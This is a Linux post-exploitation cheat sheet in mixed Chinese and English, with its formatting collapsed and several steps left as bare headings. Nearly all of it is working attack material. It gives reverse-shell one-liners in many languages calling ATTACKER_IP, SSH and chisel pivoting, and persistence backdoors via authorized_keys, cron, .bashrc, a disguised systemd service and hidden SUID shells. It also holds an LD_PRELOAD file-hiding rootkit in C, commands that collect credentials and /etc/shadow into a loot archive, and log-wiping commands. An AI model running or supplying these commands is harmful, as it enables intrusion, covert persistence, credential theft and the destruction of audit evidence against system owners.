Linux post-exploitation and persistence—rebound shell, SSH tunnel, rootkit

# 使用 Netcat 监听nc -lvnp 4444 # 使用 rlwrap 增强 Netcat（提供命令行编辑和历史功能）rlwrap nc -lvnp 4444 # 使用 socat 监听（支持更稳定的连接）socat file:`tty`,raw,echo=0 tcp-listen:4444 # 使用 Metasploit multi/handlermsfconsole -qmsf6 > use exploit/multi/handlermsf6 exploit(handler) > set payload linux/x64/shell_reverse_tcpmsf6 exploit(handler) > set LHOST 0.0.0.0msf6 exploit(handler) > set LPORT 4444msf6 exploit(handler) > exploit

# 标准 Bash 反弹 Shellbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 # Use exec method # 0<&196 way # Using /dev/udp (UDP bounce shell) ### Python bounce shell ```python# Python 3 反弹 Shellpython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' # Python 2 版本python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# 命令行直接使用python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# 标准 Netcat（带 -e 参数）nc -e /bin/bash ATTACKER_IP 4444 # 某些版本的 Netcat 不支持 -e，使用命名管道代替rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f # 使用 ncat（Nmap 的 Netcat）ncat ATTACKER_IP 4444 -e /bin/bash # Netcat OpenBSD 版本（无 -e）nc ATTACKER_IP 4444 -c /bin/bash

# PHP 命令行反弹 Shellphp -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");' # PHP complete rebound shell (applicable to Web Shell scenarios) ### Perl bounce shell ```bashperl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Socat 反弹 Shell（更稳定）socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444 # OpenSSL 加密反弹 Shell# 攻击端生成证书并监听openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodesopenssl s_server -quiet -key key.pem -cert cert.pem -port 4444 # 目标端连接mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP:4444 > /tmp/s; rm /tmp/s # PowerShell 反弹 Shell（如果目标安装了 PowerShell Core）pwsh -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" # xterm 反弹xterm -display ATTACKER_IP:0# 攻击端需要运行 Xnest :0 或 xhost +target_ip

# 步骤 1: 在反弹 Shell 中生成 PTYpython3 -c 'import pty; pty.spawn("/bin/bash")' # Step 2: Press Ctrl+Z to put the shell into the background # Step 3: Execute locally on the attacking machine # Step 4: Set up the terminal after returning to the bounce shell # Now you have a fully interactive shell ### Use script command to upgrade ```bash# 如果目标没有 Pythonscript /dev/null -c /bin/bash # 然后同样执行 Ctrl+Z 和 stty raw -echo; fg

# 攻击端监听（完全交互式）socat file:`tty`,raw,echo=0 tcp-listen:4444 # target connection ## SSH tunneling technology SSH tunnel is one of the most important network technologies in post-infiltration. It can be used to access intranet resources, bypass firewalls, and establish proxy channels. ### Local Port Forwarding Forward traffic from the local port of the attacking machine to a service on the target intranet. ```bash# 语法: ssh -L 本地端口:目标地址:目标端口 跳板机用户@跳板机地址 # 场景：通过跳板机访问内网的 Web 服务# 内网 Web 服务地址：10.10.10.20:80# 跳板机地址：192.168.1.100ssh -L 8080:10.10.10.20:80 user@192.168.1.100 # 现在访问本地 http://localhost:8080 即可访问内网 Web 服务 # 访问内网的 RDP 服务ssh -L 3389:10.10.10.30:3389 user@192.168.1.100# 使用 rdesktop localhost 连接 # 访问内网的数据库ssh -L 3306:10.10.10.40:3306 user@192.168.1.100# mysql -h 127.0.0.1 -P 3306 -u root -p # 后台运行隧道（-f 后台, -N 不执行命令）ssh -f -N -L 8080:10.10.10.20:80 user@192.168.1.100

# 语法: ssh -R 远程端口:目标地址:目标端口 攻击机用户@攻击机地址 # Scenario: Expose the target intranet service to the attacking machine # The attacking machine can now access the target's port 80 via localhost:8080 # Forward the service from another machine in the intranet # Running in the background ### Dynamic port forwarding (SOCKS proxy) Create a SOCKS proxy that can access any service on the target intranet. ```bash# 语法: ssh -D 本地端口 跳板机用户@跳板机地址 # 建立 SOCKS5 代理ssh -D 1080 user@192.168.1.100 # 后台运行ssh -f -N -D 1080 user@192.168.1.100 # 配置浏览器使用 SOCKS5 代理：127.0.0.1:1080 # 使用 proxychains 通过代理执行命令# 配置 /etc/proxychains4.conf# socks5 127.0.0.1 1080 # 通过代理扫描内网proxychains nmap -sT -Pn 10.10.10.0/24proxychains curl http://10.10.10.20proxychains ssh user@10.10.10.30 # 使用 chisel 作为替代（当 SSH 不可用时）# 攻击端（服务端）./chisel server -p 8000 --reverse # 目标端（客户端）./chisel client ATTACKER_IP:8000 R:socks# 会在攻击端 1080 端口创建 SOCKS 代理

# 场景: 攻击机 -> 跳板机1 -> 跳板机2 -> 目标内网 # The first layer: connect to the springboard machine 1 and establish a SOCKS proxy # Layer 2: Connect to Springboard 2 through a proxy # Access deep intranet through double-layer proxy ## persistence technology The purpose of persistence is to be able to regain access after the target system is restarted or the password is changed. ### SSH key implantation ```bash# 生成 SSH 密钥对（在攻击机上）ssh-keygen -t rsa -b 4096 -f /tmp/backdoor_key -N "" # 将公钥写入目标的 authorized_keys# 在目标机器上执行mkdir -p ~/.sshecho "ssh-rsa AAAA...（你的公钥内容）" >> ~/.ssh/authorized_keyschmod 700 ~/.sshchmod 600 ~/.ssh/authorized_keys # 攻击机使用私钥登录（无需密码）ssh -i /tmp/backdoor_key user@192.168.1.100 # 更隐蔽：写入 root 的 authorized_keysecho "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

# 方法一：用户级 cron 后门(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab - # Method 2: System-level cron backdoor # Method 3: Check and reestablish the connection regularly ### .bashrc / .profile backdoor ```bash# 当用户登录时自动执行echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' >> ~/.bashrc # 更隐蔽的方式echo 'nohup bash -c "sleep 10 && bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" &>/dev/null &' >> ~/.bashrc # 写入 .profile（登录时执行）echo 'nohup bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" &>/dev/null &' >> ~/.profile

# 创建恶意 systemd 服务cat > /etc/systemd/system/system-update.service << 'EOF'[Unit]Description=System Update ServiceAfter=network.target [Service]Type=simpleExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'Restart=alwaysRestartSec=60 [Install]WantedBy=multi-user.targetEOF # Enable and start the service # Check service status ### SUID backdoor ```bash# 复制 bash 并设置 SUID 位cp /bin/bash /tmp/.hidden_bashchmod u+s /tmp/.hidden_bash # 以后使用/tmp/.hidden_bash -p# 获得 root shell # 更隐蔽：放在不显眼的目录cp /bin/bash /usr/local/share/.cachechmod u+s /usr/local/share/.cache

# LD_PRELOAD 劫持示例（概念演示）# 编写恶意共享库，hook readdir 函数来隐藏特定文件 cat > /tmp/hide.c << 'EOF'#define _GNU_SOURCE#include <dirent.h>#include <dlfcn.h>#include <string.h> struct dirent *readdir(DIR *dirp) {    struct dirent *(*original_readdir)(DIR *);    original_readdir = dlsym(RTLD_NEXT, "readdir");    struct dirent *entry;    while ((entry = original_readdir(dirp)) != NULL) {        //Hide files starting with .hidden_        if (strncmp(entry->d_name, ".hidden_", 8) != 0) {            return entry;        }    }    return NULL;}EOF gcc -shared -fPIC -o /tmp/hide.so /tmp/hide.c -ldl # Set LD_PRELOAD (affects all programs) # At this time, commands such as ls will not be able to see files starting with .hidden_ ## Data collection and lateral movement ### Sensitive data collection ```bash# 搜索密码和凭据文件grep -rli "password" /etc/ /home/ /var/ 2>/dev/nullgrep -rli "passwd" /etc/ /home/ 2>/dev/null # 搜索 SSH 密钥find / -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "*.pem" 2>/dev/null # 搜索数据库凭据grep -rli "db_password\|DB_PASS\|mysql\|postgres" /var/www/ /etc/ /opt/ 2>/dev/null # 搜索配置文件中的密码find / -name "*.conf" -o -name "*.cfg" -o -name "*.ini" -o -name ".env" 2>/dev/null | xargs grep -li "pass\|secret\|key\|token" 2>/dev/null # 查看命令历史cat ~/.bash_historycat ~/.zsh_historycat /home/*/.bash_history # 查看最近修改的文件find / -mtime -7 -type f 2>/dev/null | head -50 # 导出数据库mysqldump -u root -p'password' --all-databases > /tmp/db_dump.sql # 打包敏感数据tar czf /tmp/loot.tar.gz /etc/shadow /etc/passwd /home/*/.ssh/ /var/www/ 2>/dev/null

# 使用收集到的 SSH 密钥连接其他主机ssh -i /home/user/.ssh/id_rsa user@10.10.10.20 # Use the collected password to try to log in to other hosts # Bulk password spraying # Forwarding via SSH agent ## trace cleaning After the penetration test is completed (authorized testing only), the traces left behind need to be cleaned up. ```bash# 清除命令历史history -cecho "" > ~/.bash_historyrm -f ~/.bash_history # 清除日志echo "" > /var/log/auth.logecho "" > /var/log/syslogecho "" > /var/log/apache2/access.logecho "" > /var/log/apache2/error.log # 清除 lastlog 和 wtmpecho "" > /var/log/lastlogecho "" > /var/log/wtmpecho "" > /var/log/btmp # 修改文件时间戳# 将文件时间戳改为与周围文件一致touch -r /etc/hosts /tmp/backdoor_file # 清除临时文件rm -rf /tmp/exploit* /tmp/linpeas* /tmp/shell* # 删除添加的用户userdel -r hacker # 移除 SSH 密钥sed -i '/attacker_key/d' /root/.ssh/authorized_keys # 移除 cron 后门crontab -rsed -i '/ATTACKER_IP/d' /etc/crontab # 移除 systemd 后门systemctl disable system-update.servicerm /etc/systemd/system/system-update.servicesystemctl daemon-reload